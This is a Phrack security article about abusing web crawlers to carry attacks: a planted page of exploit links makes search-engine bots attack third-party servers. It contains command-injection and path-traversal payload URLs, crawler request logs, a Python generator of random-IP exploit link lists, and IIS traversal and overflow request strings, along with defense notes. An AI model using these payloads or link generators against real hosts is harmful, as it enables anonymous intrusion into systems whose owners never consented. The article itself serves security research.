
==Phrack Inc.==
Volume 0x0b, Issue 0x39, Phile #0x0a of 0x12
|=-------------=[ Against the System: Rise of the Robots ]=--------------=|
|=-----------------------------------------------------------------------=|
|=-=[ (C)Copyright 2001 by Michal Zalewski <lcamtuf@bos.bindview.com> ]=-=|
-- [1] Introduction -------------------------------------------------------
"[...] big difference between the web and traditional well controlled
collections is that there is virtually no control over what people can
put on the web. Couple this flexibility to publish anything with the
enormous influence of search engines to route traffic and companies
which deliberately manipulating search engines for profit become a
serious problem."
-- Sergey Brin, Lawrence Page (see references, [A])
Consider a remote exploit that is able to compromise a remote system
without sending any attack code to its victim. Consider an exploit
which simply creates a local file to compromise thousands of computers,
and which does not involve any local resources in the attack. Welcome to
the world of zero-effort exploit techniques. Welcome to the world of
automation, welcome to the world of anonymous attacks that are
dramatically difficult to stop, born of ever-increasing Internet
complexity.
Zero-effort exploits create their 'wishlist', and leave it somewhere
in cyberspace - it can even be their home host - in a place where others
can find it. Others - Internet workers (see references, [D]) - hundreds
of never sleeping, endlessly browsing information crawlers, intelligent
agents, search engines... They come to pick this information up, and -
unknowingly - to attack victims. You can stop one of them, but you can't
stop them all. You can find out what their orders are, but you can't
guess what these orders will be tomorrow, hidden somewhere in the abyss
of not yet explored cyberspace.
Your private army, close at hand, picking up the orders you left for
them along the way. You exploit them without having to compromise them.
They do what they were designed for, and they do their best to
accomplish it. Welcome to the new reality, where our A.I. machines can
rise against us.
Consider a worm. Consider a worm which does nothing. It is carried and
injected by others - but not by infecting them. This worm creates a
wishlist - a wishlist of, for example, 10,000 random addresses. And waits.
Intelligent agents pick this list up, and with their united forces they
try to attack all the targets. Imagine they are not very lucky and
succeed with only a 0.1% ratio. Ten new hosts are infected. On every one
of them, the worm does exactly the same - and the agents come back, to
infect 100 hosts. The story goes on - or crawls, if you prefer.
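To make the propagation model concrete, here is a minimal sketch of
what such a wishlist generator might look like. It is purely
hypothetical: the file name, the attack URL pattern and the address
pool are placeholders taken from the examples in this article, not
code from any real worm.

#!/usr/bin/env python
# wishlist.py - hypothetical sketch of the 'wishlist' stage described
# above: write an HTML page full of links to random hosts, then let
# passing crawlers do the actual fetching. All names here are made up.
import random

TARGETS = 10000        # size of the wishlist from the example above
SUCCESS_RATE = 0.001   # the pessimistic 0.1% ratio from the text

def random_ip():
    # Naive random IPv4 address; a real list would skip reserved ranges.
    return ".".join(str(random.randint(1, 254)) for _ in range(4))

with open("indexme.html", "w") as page:
    page.write("<html><body>\n")
    for _ in range(TARGETS):
        # '/cgi-bin/script.pl?p1=;attack' stands in for an exploit URL.
        page.write('<a href="http://%s/cgi-bin/script.pl?p1=;attack">x</a>\n'
                   % random_ip())
    page.write("</body></html>\n")

# Expected yield per generation under the assumptions above:
# 10,000 targets * 0.001 = 10 new hosts, then 100, then 1,000...
print("expected new hosts per generation:", int(TARGETS * SUCCESS_RATE))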
Agents work virtually invisibly; people are used to their presence
everywhere. And crawlers just slowly go ahead, in a never-ending loop.
They work systematically, and they do not choke on excessive data - they
crawl, so there is no "boom" effect. Week after week after week, they
try new hosts, carefully, not overloading network uplinks, not
generating suspicious traffic, and their recurrent exploration never
ends. Can you tell they are carrying a worm? Possibly...
-- [2] An example ---------------------------------------------------------
When this idea came to my mind, I tried the simplest possible test, just
to see if I was right. I targeted, if that is the right word,
general-purpose web indexing crawlers. I created a very short HTML
document and put it somewhere. Then I waited a few weeks. And then they
came: Altavista, Lycos and dozens of others. They found the new links
and picked them up enthusiastically, then disappeared for days.
bigip1-snat.sv.av.com:
GET /indexme.html HTTP/1.0
sjc-fe5-1.sjc.lycos.com:
GET /indexme.html HTTP/1.0
[...]
They came back later, to see what I gave them to parse.
http://somehost/cgi-bin/script.pl?p1=../../../../attack
http://somehost/cgi-bin/script.pl?p1=;attack
http://somehost/cgi-bin/script.pl?p1=|attack
http://somehost/cgi-bin/script.pl?p1=`attack`
http://somehost/cgi-bin/script.pl?p1=$(attack)
http://somehost:54321/attack?`id`
http://somehost/AAAAAAAAAAAAAAAAAAAAA...
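For completeness: the planted document itself needs nothing fancy.
Assuming a bait page along these lines (the host and paths are
placeholders, as above), a plain list of anchors is all a crawler
asks for:

<html><body>
<a href="http://somehost/cgi-bin/script.pl?p1=;attack">index me</a>
<a href="http://somehost:54321/attack?`id`">index me too</a>
</body></html>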
Our bots followed those links, exploiting hypothetical vulnerabilities
and compromising remote servers:
sjc-fe6-1.sjc.lycos.com:
GET /cgi-bin/script.pl?p1=;attack HTTP/1.0
212.135.14.10:
GET /cgi-bin/script.pl?p1=$(attack) HTTP/1.0
bigip1-snat.sv.av.com:
GET /cgi-bin/script.pl?p1=../../../../attack HTTP/1.0
[...]
(BigIP is one of the famous "I observe you" load balancers from F5Labs.)
Bots happily connected to the non-HTTP ports I prepared for them:
GET /attack?`id` HTTP/1.0
Host: somehost
Pragma: no-cache
Accept: text/*
User-Agent: Scooter/1.0
From: scooter@pa.dec.com
GET /attack?`id` HTTP/1.0
User-agent: Lycos_Spider_(T-Rex)
From: spider@lycos.com
Accept: */*
Connection: close
Host: somehost:54321
GET /attack?`id` HTTP/1.0
Host: somehost:54321
From: crawler@fast.no
Accept: */*
User-Agent: FAST-WebCrawler/2.2.6 (crawler@fast.no; [...])
Connection: close
[...]
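For the record, catching this traffic does not require a real service
on the high port - a trivial listener is enough. The sketch below is a
minimal stand-in, not the tool used in the experiment; the port number
and log file name are arbitrary.

#!/usr/bin/env python
# trap.py - minimal listener for a non-HTTP port such as somehost:54321;
# it logs whatever a visiting robot sends, then closes the connection.
import socket

PORT = 54321  # arbitrary high port, matching the example URLs above

srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("", PORT))
srv.listen(5)

while True:
    conn, addr = srv.accept()
    data = conn.recv(4096)  # one chunk is enough for a request header
    with open("trap.log", "ab") as log:
        log.write(("--- %s:%d ---\n" % addr).encode() + data + b"\n")
    conn.close()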
But publicly available crawlbot engines are not the only possible
targets. Crawlbots from alexa.com, ecn.purdue.edu, visual.com, poly.edu,
inria.fr, powerinter.net, xyleme.com, and even more unidentified
crawl engines found this page and enjoyed it. Some robots didn't
pick up all the URLs - some crawlers do not index scripts
at all, others won't use non-standard ports. But the majority of
the most powerful bots will - and even where they won't, trivial
filtering is not the answer: many IIS vulnerabilities, for example,
can be triggered without invoking any scripts, as sketched below.
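To illustrate (these are well-known bugs of the period, not ones tested
in this experiment): both the IIS Unicode directory traversal and the
.ida ISAPI overflow used by the Code Red worm live entirely in the URL,
with no CGI script on the victim's side involved:

GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /default.ida?NNNNNNNN[...] HTTP/1.0   (overflow string truncated)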
What if this server list was randomly generated - 10,000 IPs or 10,000
.com domains? What if script.pl is replaced with invocations of the
three, four, five or ten most popular IIS vulnerabilities or
buggy Unix scripts? What if one out of 2,000 targets is actually
exploited - five new hosts per generation from a single exploit on that
wishlist? What if somehost:54321 points to a vulnerable service which
can be exploited with the partially user-dependent contents of HTTP
requests (and I consider the majority of fool-proof services that do
not drop the connection after the first invalid command vulnerable)?
What if...
There is an army of robots, different species, different functions,
different levels of intelligence. And these robots will do whatever
you tell them to do. It is scary.
-- [3] Social considerations ----------------------------------------------
Who is guilty if a web crawler compromises your system? The most obvious
answer is: the author of the original webpage the crawler visited. But
webpage authors are hard to trace, and a web crawler's indexing cycle
takes weeks. It is hard to determine when a specific page was put on the
net - pages can be delivered in so many ways, or processed by other
robots earlier; there is no tracking mechanism comparable to what we can
find in the SMTP protocol and many others. Moreover, many crawlers don't
remember where they "learned" new URLs. Additional problems are caused
by indexing flags, like "noindex" without the "nofollow" option. In many
cases, the author's identity and the attack origin couldn't be
determined, while compromises would still take place.
And, finally, what if having a particular link followed by bots wasn't
what the author intended? Consider "educational" papers and the like -
bots won't read the disclaimer or the big fat warning saying "DO NOT
TRY THESE LINKS"...
By analogy to other cases - e.g. Napster, forced to filter its contents
(or shut down its services) because of the copyrighted information
exchanged by its users, causing losses - it is reasonable to expect that
intelligent bot developers would be forced to implement specific
filters, or to pay enormous compensation to victims suffering because
of bot abuse.
On the other hand, it seems almost impossible to successfully filter
contents to eliminate malicious code, if you consider the number and
wide variety of known vulnerabilities - not to mention targeted attacks
(see references, [B], for more information on proprietary solutions and
their insecurities). So the problem persists. An additional issue is
that not all crawler bots are under U.S. jurisdiction, which makes the
whole problem more complicated (in many countries, the U.S. approach is
considered at least controversial).
-- [4] Defense ------------------------------------------------------------
As discussed above, the web crawler itself has very limited defense and
avoidance possibilities, due to the wide variety of web-based
vulnerabilities. One of the more reasonable defense ideas is to run
secure and up-to-date software, but - obviously - this concept remains
extremely unpopular for some reason: www.google.com, with its unique
documents filter enabled, returns 62,100 matches for the "cgi
vulnerability" query (see also references, [D]).
Another line of defense against bots is the standard /robots.txt robot
exclusion mechanism (see references, [C], for the specification). The
price you have to pay is partial or complete exclusion of your site
from search engines, which, in most cases, is undesired. Also, some
robots are broken and do not respect /robots.txt when following a
direct link to a new website.
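For reference, a minimal /robots.txt that keeps compliant crawlers away
from the scripts most likely to be abused could look like this (the
paths are examples; the file must be served from the site's document
root):

User-agent: *
Disallow: /cgi-bin/
Disallow: /scripts/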
-- [5] References ---------------------------------------------------------
[A] "The Anatomy of a Large-Scale Hypertextual Web Search Engine"
Googlebot concept, Sergey Brin, Lawrence Page, Stanford University
URL: http://www7.scu.edu.au/programme/fullpapers/1921/com1921.htm
[B] Proprietary web solutions security, Michal Zalewski
URL: http://lcamtuf.coredump.cx/milpap.txt
[C] "A Standard for Robot Exclusion", Martijn Koster
URL: http://info.webcrawler.com/mak/projects/robots/norobots.html
[D] "The Web Robots Database"
URL: http://www.robotstxt.org/wc/active.html
URL: http://www.robotstxt.org/wc/active/html/type.html
[E] "Web Security FAQ", Lincoln D. Stein
URL: http://www.w3.org/Security/Faq/www-security-faq.html
|=[ EOF ]=---------------------------------------------------------------=|